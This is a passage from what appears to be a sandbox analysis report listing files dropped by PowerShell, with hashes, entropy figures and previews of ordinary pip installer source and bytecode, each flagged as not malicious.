                                                                                                                                                                                                              Preview:.........j.ei ........................4.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&m'Z'..d.d.l(m)Z)m*Z*....G.d...d.e.jV..................jX..........................Z-..G.d...d.e.........Z,y.)......N)...Collection..Dict..Iterable..Iterator..Mapping..Optional..Sequence..cast)...Requirement)...NormalizedName..canonicalize_name)...parse)...InvalidWheel..UnsupportedWheel)...BaseDistribution..BaseEntryPoint..DistributionVersion..InfoPath..Wheel)...normalize_path)...TempDirectory)...parse_wheel..read_wheel_metadata_file.....)...BasePath..get_dist_namec...........................e.Z.d.Z.d.Z.d.e.e.j...................e.f.....d.e.j...................d.d.f.d...Z.e.d.e.j...................d.e.d.e.d.d.f.d...........Z.d.e.d.e.e.j.......................f.d...Z.d.e.d.e.e.....f.d...Z.y.)...WheelDistributiona....An ``importlib.metadata.Distributi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11197
                                                                                                                                                                                                              Entropy (8bit):5.461926100026363
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZYRtUHS4ArSYer719Rzhp0AArfoQpe3bKaHvc5wy1MO9H8xtxk2y2sCLA3vs:Z04YYhDzhp5ArANrKaP5IMO9H8xHzcCB
                                                                                                                                                                                                              MD5:8BED312E85910DBFCC4A6E372EEA0D01
                                                                                                                                                                                                              SHA1:C028DD46A55114C2EE420A95563E2BCBA9D1497A
                                                                                                                                                                                                              SHA-256:5CB6838FCD8764A5933126D0709434C81C862D8B543AE0BB734599D07ABA122C
                                                                                                                                                                                                              SHA-512:679AF8DCC1507233F81BEDB3D56709A4E7A516939A31D715651812A4EE6DF6FF84EAB62CEFEF018A0EDC1375D71365AB1DC37176A47B5DB0C41A630CD6EEF8FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e .........................l.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"....e.jF..................e$........Z%d.e&d.e'f.d...Z(..G.d...d.........Z)..e.jT..................d...........d.e.e&....d.d.f.d...........Z+..G.d...d.e.........Z,y.)......N)...Iterator..List..Optional..Sequence..Set..Tuple)...NormalizedName..canonicalize_name)...BaseDistribution..BaseEnvironment)...Wheel....deprecated)...WHEEL_EXTENSION.....)...BadMetadata..BasePath..get_dist_name..get_info_location)...Distribution..location..returnc...........................|.j...................t.................s.y.t.........j...................j...................|.........s.y.t.........j...................j...................t.........j...................j...................|.................s.y.t.........j...................|.........S.).NF)...endswithr.....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1882
                                                                                                                                                                                                              Entropy (8bit):4.602899198329515
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Vu5TvCOOJGAx1Mzc2qwgrdi87bF/6S118ZsCEmn:VuZeJGuwc2qDrdhX5v1gamn
                                                                                                                                                                                                              MD5:868E0CB17D54C2243F5F83B20268B8CB
                                                                                                                                                                                                              SHA1:C14B0C6281F758B43FB481B2E0AEFDB447A07E54
                                                                                                                                                                                                              SHA-256:1807BFA6B21F084E2253296B9EBFF67494659240554546CE89D128203ECB3E81
                                                                                                                                                                                                              SHA-512:2FDE33A9380FE437DD64FEDA942A9AA18EF7A16D3FE99B25851A986E7191A2287C1C803B768F1A9D74040F9A9CA81B2EA349029EC558C5500F580F04E81F7522
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import importlib.metadata.from typing import Any, Optional, Protocol, cast...class BadMetadata(ValueError):. def __init__(self, dist: importlib.metadata.Distribution, *, reason: str) -> None:. self.dist = dist. self.reason = reason.. def __str__(self) -> str:. return f"Bad metadata in {self.dist} ({self.reason})"...class BasePath(Protocol):. """A protocol that various path objects conform... This exists because importlib.metadata uses both ``pathlib.Path`` and. ``zipfile.Path``, and we need a common base for type hints (Union does not. work well since ``zipfile.Path`` is too new for our linter setup)... This does not mean to be exhaustive, but only contains things that present. in both classes *that we need*.. """.. @property. def name(self) -> str:. raise NotImplementedError().. @property. def parent(self) -> "BasePath":. raise NotImplementedError()...def get_info_location(d: importlib.metadata.Distribution) ->
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8297
                                                                                                                                                                                                              Entropy (8bit):4.532947846517071
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:wV/IFzf7wLao/k2oPIU58MrweBGWqD8JklAWaV8s455l6Ow51Y2Zn:wVAJc+o/BorCMrw/AxVzoJw7Ysn
                                                                                                                                                                                                              MD5:420DDAA2C0D5E2B00A0943680DAED63C
                                                                                                                                                                                                              SHA1:FBFC2FC17E02A9C351968789E159C4AAD2AC5EB9
                                                                                                                                                                                                              SHA-256:50F975C14BA316A8B08A5B51275B4C178D9644834ED6C4A934D958436997D269
                                                                                                                                                                                                              SHA-512:30415907241FA13E17FD81E8E4F174DEF734B8F38C6B0BB97B7E0483EF04D6EA573B63E2B4DBAEBBA729645CFAA5DB8BB9CFDBA960FAD80F636547ED2551A40C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import email.message.import importlib.metadata.import os.import pathlib.import zipfile.from typing import (. Collection,. Dict,. Iterable,. Iterator,. Mapping,. Optional,. Sequence,. cast,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import InvalidWheel, UnsupportedWheel.from pip._internal.metadata.base import (. BaseDistribution,. BaseEntryPoint,. DistributionVersion,. InfoPath,. Wheel,.).from pip._internal.utils.misc import normalize_path.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file..from ._compat import BasePath, get_dist_name...class WheelDistribution(importlib.metadata.Distribution):. """An ``importlib.metadata.Distribution`` read from a wheel... Although ``importlib.m
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7456
                                                                                                                                                                                                              Entropy (8bit):4.438434499132661
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:oL4LS4ArV0a94hpVLTUKNBo4XxcnXLBWa:o94c4hpVLYKNK+4Bz
                                                                                                                                                                                                              MD5:DEB78E4A0BC1E78858B6836A8697F58D
                                                                                                                                                                                                              SHA1:02DA419A727D5C6BAC5CCFEB9FA2B6EC90929E0C
                                                                                                                                                                                                              SHA-256:5D36852181113F6245D10519B8FC761138AE8176CF11C67CABC64A7A1B7A2E97
                                                                                                                                                                                                              SHA-512:C251C5236F859AFBAD12C563F796E469CB10E20ECED6908F02806FB3F10DF994769DA27CA4AC68F0D423C485938141D1B39A9BD336B9D4AA66A40C9390860844
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import importlib.metadata.import logging.import os.import pathlib.import sys.import zipfile.import zipimport.from typing import Iterator, List, Optional, Sequence, Set, Tuple..from pip._vendor.packaging.utils import NormalizedName, canonicalize_name..from pip._internal.metadata.base import BaseDistribution, BaseEnvironment.from pip._internal.models.wheel import Wheel.from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION..from ._compat import BadMetadata, BasePath, get_dist_name, get_info_location.from ._dists import Distribution..logger = logging.getLogger(__name__)...def _looks_like_wheel(location: str) -> bool:. if not location.endswith(WHEEL_EXTENSION):. return False. if not os.path.isfile(location):. return False. if not Wheel.wheel_file_re.match(os.path.basename(location)):. return False. return zipfile.is_zipfile(location)...class _DistributionFinder:. """Finder to loca
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10035
                                                                                                                                                                                                              Entropy (8bit):4.503412051370959
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wtr9aOs71L0KaDjLPddsa5Il5xNIWTbBpb373WX/FxY5of:wtBaO0AH7EFTH3UxYG
                                                                                                                                                                                                              MD5:897E459520E104211FC347EA05C760CF
                                                                                                                                                                                                              SHA1:2C5FD18665771B95A89E6C14EBE587FF3A5B4B93
                                                                                                                                                                                                              SHA-256:A298F0E08052A87BE27BAB1727F71B4F8DA67B28283C451F354449B96658EEC9
                                                                                                                                                                                                              SHA-512:2837EAFFD82F35A9DD8A5478D00E472E8E496AB8B17FE5141FFB155558652216EB1FC770C0CD17307F32F3800AAFD0DF399C4DB7E78C89A05DACD653D6C77E96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import email.message.import email.parser.import logging.import os.import zipfile.from typing import Collection, Iterable, Iterator, List, Mapping, NamedTuple, Optional..from pip._vendor import pkg_resources.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import InvalidWheel, NoneMetadataError, UnsupportedWheel.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.misc import display_path, normalize_path.from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file..from .base import (. BaseDistribution,. BaseEntryPoint,. BaseEnvironment,. DistributionVersion,. InfoPath,. Wheel,.)..__all__ = ["NAME", "Distribution", "Environment"]..logger = logging.getLogger(__name__)..NAME = "pkg_resources"...class EntryPoint(NamedTuple):. name: str.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):63
                                                                                                                                                                                                              Entropy (8bit):4.022085131599381
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:sJlRFQviFIaqtPjuqOfv:s7+CoJOfv
                                                                                                                                                                                                              MD5:F4122DF11215E5CC0F203F0C4B9238E9
                                                                                                                                                                                                              SHA1:AF1B34A8655A6A39832635A34DCBC060412ED6CB
                                                                                                                                                                                                              SHA-256:DC31D477FAB1A4FA337F3A2EA2A6BD83DB6CD42CEBE6A6877C5C5B9F1AE27A93
                                                                                                                                                                                                              SHA-512:C836375798F4D4BAB31E84974C93F930B7975DD126E0A6AEB4239D32D74985D091FD82EC7F9260167F243C3FF27B513681E623D74830489DEEBC20CEE9A3C3AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""A package that contains models that represent entities..""".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                              Entropy (8bit):5.087049911968757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:LfaCCyc+CoJOh/Z6B0WltOu95/n23d6oAreKAjQ6IaYleHXlll:TaCCwCou6BvPOg/2ImbjQjaYkH1ll
                                                                                                                                                                                                              MD5:B8B497AEB47F0A47EDEA92C6F6C19F94
                                                                                                                                                                                                              SHA1:70ED0076E0D7EF93B9F54A6EF138A3485E48E643
                                                                                                                                                                                                              SHA-256:272590004C5A9273A4794F24E9114677B5A767B03C5D79ADA14C7075B54D7F7C
                                                                                                                                                                                                              SHA-512:30BC376292892E83F2F4F1CC2A3CA12E55144556C30718CC9827D2F3635E62D2C87E21B3F59F96FEF674BDF5D1041566794EAC3C2D61FB39DFBC0ADE050AFF98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e?...............................d.Z.y.).z8A package that contains models that represent entities..N)...__doc__........qC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1922
                                                                                                                                                                                                              Entropy (8bit):5.158847250848427
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:BjxagUy0rnSEddyfGqfIi2LXk0rw/z0rlNVk0riKaw8G0rUAqg6STqxtX+k:Jxa3SYdy+sYXF5lNVFTJ8TUQ6STqLV
                                                                                                                                                                                                              MD5:307B664A9C91364DCEA15BD5B15C32DA
                                                                                                                                                                                                              SHA1:2A5AFD5A77F4340AE7B55F3935CBC5F54853510F
                                                                                                                                                                                                              SHA-256:860B97403E12CCD8ED48C146F59BF5EF2D69562B17892346215569F158524C7D
                                                                                                                                                                                                              SHA-512:8E5308F0FE0F1BFFE91EDEC0B1915D88F33C7607FD77F0A7757F44FFA94867E181BE63D8D598642F1D31A9646FF83E4161FACC1D802B74E15E19E6A60A7A847F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................>.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...parse)...Link)...KeyBasedCompareMixinc.....................T.......e.Z.d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.d.f...f.d...Z.d.e.f.d...Z.d.e.f.d...Z...x.Z.S.)...InstallationCandidatez4Represents a potential "candidate" for installation.....name..version..linkr....r....r......returnNc............................|.|._.........t.........|.........|._.........|.|._.........t...........|.....|.j...................|.j...................|.j...................f.t.....................y.).N)...key..defining_class).r......parse_versionr....r......super..__init__r....)...selfr....r....r......__class__s.... ..rC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/candidate.pyr....z.InstallationCandidate.__init__....sH...............$.W..-...........................D.L.L.$.).)..4..0...............c.....................d.....d.j..................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11213
                                                                                                                                                                                                              Entropy (8bit):5.1291760885551785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:oHHq60W5mozAf0rJbANNiIMtCf2tE7cit+Gqyzm:oHHq60WEoMf0rJbAjf2Fit32
                                                                                                                                                                                                              MD5:F4C47C5A4C8D5594957D0DC4BE250BA4
                                                                                                                                                                                                              SHA1:9A3EF29C428B99291E134A88055ABD92FCF15F2C
                                                                                                                                                                                                              SHA-256:7E16FB9E449A2BED054D056388745C24940B5442EAC07897A7C53C232FDB97A7
                                                                                                                                                                                                              SHA-512:AEB7EC5F0F77D6D8F7EBF27F2FF8BD3BBF0C28A8D55A92289509C39619B1C7D7FFD9D6BDD4F1CE578E54EFA491C7DB93ED477E0C6D305D8AE3C90B97B283ECE8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z...e.d.........Z.d.Z...e.j ..................d.........Z...G.d...d.e.........Z...d.d.e.e.e.f.....d.e.e.....d.e.d.e.e.....d.e.e.....f.d...Z...d.d.e.e.e.f.....d.e.e.....d.e.d.e.e.....d.e.f.d...Z.d.e.e.d.........d.d.f.d...Z.d.e.d.e.e.e.f.....f.d...Z...G.d...d.........Z...G.d...d.........Z...G.d...d.........Z.e.e.e.e.f.....Z...G.d...d.........Z.y.).z. PEP 610 .....N)...Any..Dict..Iterable..Optional..Type..TypeVar..Union)...DirectUrl..DirectUrlValidationError..DirInfo..ArchiveInfo..VcsInfo..Tz.direct_url.jsonz.^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$c...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........sC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/direct_url.pyr....r........s.........r....r......d..expected_type..key..default..returnc.....................\.....|.|.v.r.|.S.|.|...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4244
                                                                                                                                                                                                              Entropy (8bit):5.237865267822263
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:JDaQLfBUJseVokjV2ztPxZXV9eahDswPsxhWtMM4/nG3njANsR+YCFwEnP6WYmv+:/Z0okKtZL9ywUxctMo3cNw+n7P6WYmWp
                                                                                                                                                                                                              MD5:7B914816B2430580DD6CB9E523308122
                                                                                                                                                                                                              SHA1:397751B6F3020E9A9B0FAE2A26A48D82B52F54BD
                                                                                                                                                                                                              SHA-256:A0371447F989DF7F4035BCD0EC8A902FAFA348076EAC33D622C688378E3C6BBF
                                                                                                                                                                                                              SHA-512:95F7AE2B23713FC884C0742FBCB591FB271460C404CD7FDE09FA987688B836ED493C9F18D593B150A13559C4A12DD208F6C0ABA71BE1BD3AF98EEC1EB5D46817
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................D.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...FrozenSet..Optional..Set)...canonicalize_name)...CommandErrorc..........................e.Z.d.Z.d.Z.d.d.g.Z.....d.d.e.e.e.........d.e.e.e.........d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.f.d...Z.e.d.e.d.e.e.....d.e.e.....d.d.f.d...........Z.d.e.d.e.e.....f.d...Z.d.d...Z.y.)...FormatControlzBHelper for managing formats from which a package can be installed...no_binary..only_binaryN..returnc.....................P.....|...t.................}.|...t.................}.|.|._.........|.|._.........y...N)...setr....r....)...selfr....r....s.... .wC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/format_control.py..__init__z.FormatControl.__init__....s-...................I..........%.K.."......&............otherc..............................t.............j...........................s.t.........S...j.....................j..........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1711
                                                                                                                                                                                                              Entropy (8bit):5.16990719118135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:C+7U1jaofQjeJEP2h886x8wA0q7o5BZYj8V4:C6uakQjGjH6x8whP58v
                                                                                                                                                                                                              MD5:9B779BD5E0BF14942FEB062BD7B91694
                                                                                                                                                                                                              SHA1:CC97F7957F718D8CBABE4C8B5E80EF589E3327C3
                                                                                                                                                                                                              SHA-256:A4E18BD7FA257FAB932B0F7989E3D37D435BB05BCCD3B4A69C22CA9CFC9CDBE1
                                                                                                                                                                                                              SHA-512:BEF24D0B67A514B28ECCCED73F619AFC70B14F1583F0777CCAF113F41A9120C9880DADA997D04E7F702F9BD1C35F2DCE467EB1EDEC63E083F5A818B3D385E0AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................H.....d.d.l.Z...G.d...d.........Z...e.d.d...........Z...e.d.d...........Z.y.)......Nc.....................H.......e.Z.d.Z.d.Z.g.d...Z.d.e.d.e.d.d.f...f.d...Z.d.e.d.e.f.d...Z...x.Z.S.)...PackageIndexzBRepresents a Package Index and provides easier access to endpoints)...url..netloc..simple_url..pypi_url..file_storage_domainr....r......returnNc.............................t...........|...............|.|._.........t.........j...................j...................|.........j...................|._.........|.j...................d.........|._.........|.j...................d.........|._.........|.|._.........y.).N..simple..pypi)...super..__init__r......urllib..parse..urlsplitr......_url_for_pathr....r....r....)...selfr....r......__class__s.... ..nC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/index.pyr....z.PackageIndex.__init__....s_............................l.l..+..+.C..0..7..7.........,..,.X..6
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2286
                                                                                                                                                                                                              Entropy (8bit):5.2234725216621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1Y/mKpXW2e6Y0RU1vEmFqLaGPyyhzRwLIWQGSKHOT8Dd43Zz7gsS:4DU1vKawh1wEWQGshE
                                                                                                                                                                                                              MD5:750AFA2362E5748EAA1815E99F94D509
                                                                                                                                                                                                              SHA1:5FEDD403511248F2B2D574EA26F8C9BE167063A1
                                                                                                                                                                                                              SHA-256:F9F6CF042AB28D842731954B028907FF6186E111B0C2BA55EBD03A798BAA2BE0
                                                                                                                                                                                                              SHA-512:1595518A00B56B73542F82BF67BED44DDD60386167823045FE30DBFDE638DE9C71D33256F684B5A5BAE392ADF4AD6F4C63D3CE908AC82F39B2A20A97EDB5A475
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................P.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Any..Dict..Sequence)...default_environment)...__version__)...InstallRequirementc.....................X.....e.Z.d.Z.d.e.e.....f.d...Z.e.d.e.d.e.e.e.f.....f.d...........Z.d.e.e.e.f.....f.d...Z.y.)...InstallationReport..install_requirementsc...........................|.|._.........y.).N)..._install_requirements)...selfr....s.... .|C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/installation_report.py..__init__z.InstallationReport.__init__....s.......%9....".......ireq..returnc.....................n.....|.j...................s.J.d.|...............|.j...................j...........................|.j...................|.j...................r.|.j...................j...................n.d.|.j...................|.j...........................j...................d...}.|.j...................r$|.j................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26017
                                                                                                                                                                                                              Entropy (8bit):5.335353523740351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:tNqtIOj9xGjPTN2yEARn3AXb74UHriXyZi617+mRVH4aIZT3QtL8CmVC3:cIU9kjLVEARnQXbEUHrl15ROaIZzQtIA
                                                                                                                                                                                                              MD5:5ABD0D46797698210F40D41B5661015A
                                                                                                                                                                                                              SHA1:D521EDF2B6EA09952ADE33251BD619FD2AD288F2
                                                                                                                                                                                                              SHA-256:6B9B396CBF33F42122A130CBE162243EC016A5B393399C08F0B365EA962A608C
                                                                                                                                                                                                              SHA-512:8FC0C90401E09897BA3D54CC434686E9B80C7C06840170895E58C2D24A57E6A80164C863E95E0498344E94F024EDB1FE33017893E3D1A0A4AA8CBF009DEF587A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e)Q.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..e.r.d.d.l$m%Z%....e.jL..................e'........Z(d.Z)..e.d.............G.d...d.................Z*..e.d.............G.d...d.................Z+d.e.e.e,e,f.........d.e.e.e,e,f.........f.d...Z-d.e,d.e,f.d...Z.d.e,d.e,f.d...Z/..e.j`..................d.e.jb..........................Z2d.e,d.e3d.e,f.d...Z4d.e,d.e,f.d...Z5..G.d...d.e ........Z6..G.d ..d!e.........Z7d"e6d.e7f.d#..Z8..e.jr..................d..$........d%e6d&e6d.e3f.d'..........Z:y.)(.....N)...dataclass)...TYPE_CHECKING..Any..Dict..List..Mapping..NamedTuple..Optional..Tuple..Union)...deprecated)...WHEEL_EXTENSION)...Hashes)...pairwise..redact_auth_from_url..split_auth_from_netloc..splitext)...KeyBasedCompareMixin)...path_to_url..url_to_path)...IndexContent)...sha512..sha384..sha256..sha22
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1186
                                                                                                                                                                                                              Entropy (8bit):5.3746540248334735
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:bCmaThRLwHUp/tlt2FCry16xOpm6OJ23t/iRBmRRD/hoKhklRT:umAhRLw0p/tQCWm96221iRiRbhrsT
                                                                                                                                                                                                              MD5:6CF53957889A01129FAD2511B799C43E
                                                                                                                                                                                                              SHA1:EA48C798EBB768C2A65B3895800268B60DAFB9F6
                                                                                                                                                                                                              SHA-256:637C2C714D26C0417AE6C925B3C12C30C471F215EC5BB3C44D3766753DF67184
                                                                                                                                                                                                              SHA-512:780163D9F444B7C2E8308FC030FE7E0CDB43D9377C3C336E471365D31C0BEB14A77AD000AEF82F10E5841CF3FBA4126E94CD6C47B7D622A49C5774C6CA5BCF0F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................$.....d.Z.g.d...Z...G.d...d.........Z.y.).z..For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation......platlib..purelib..headers..scripts..datac.....................4.....e.Z.d.Z.d.Z.e.Z.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.)...SchemeztA Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. r....r....r....r....r......returnNc.....................J.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).Nr....)...selfr....r....r....r....r....s.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/scheme.py..__init__z.Scheme.__init__....s'...............................................)...__name__..__module__..__qualname__..__doc__..SCHEME_KEYS..__slots__..strr......r....r....r....r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5105
                                                                                                                                                                                                              Entropy (8bit):5.3148688929850065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qkVEGeVpXT8SQ3ZgilOrmc1rfQyXsPlN24lUz:lVE3HT8jSVrmsrfQFNdUz
                                                                                                                                                                                                              MD5:75AA7B08F844EFD7EDF1F4C7E098E41C
                                                                                                                                                                                                              SHA1:538EA3CA3EADE481C1AF767212EFFEAF54D4BF33
                                                                                                                                                                                                              SHA-256:04416CC72C58A1365B034566232588AEBC886C0C2D97DC8604A1E694D1976B70
                                                                                                                                                                                                              SHA-512:5ECDBE70B635DEF0C05BB7B43C3DDAC54DEF5C5A6EE4F9C7E3D8C06939ACAE07FCC67462D36F9A43A976AF15D4EB59FCCF31B0B57B275BBAB103E8C40EAFFFCB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j"..................e.........Z...G.d...d.........Z.y.)......N)...List)...canonicalize_name)...PyPI)...has_tls)...normalize_path..redact_auth_from_urlc..........................e.Z.d.Z.d.Z.g.d...Z.e.d.e.e.....d.e.e.....d.e.d.d.f.d...........Z.d.e.e.....d.e.e.....d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...SearchScopezF. Encapsulates the locations that pip is configured to search.. ....find_links..index_urls..no_indexr....r....r......returnc..........................g.}.|.D.]P..}.|.j...................d.........r,t.........|.........}.t.........j...................j...................|.........r.|.}.|.j...................|............R..t.................s`t.........j...................|.|.........D.]G..}.t.........j...................j...................|.........}.|.j...................d.k(..s..2t.........j.........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1868
                                                                                                                                                                                                              Entropy (8bit):5.38136101204672
                                                                                                                                                                                                              Encrypted:false
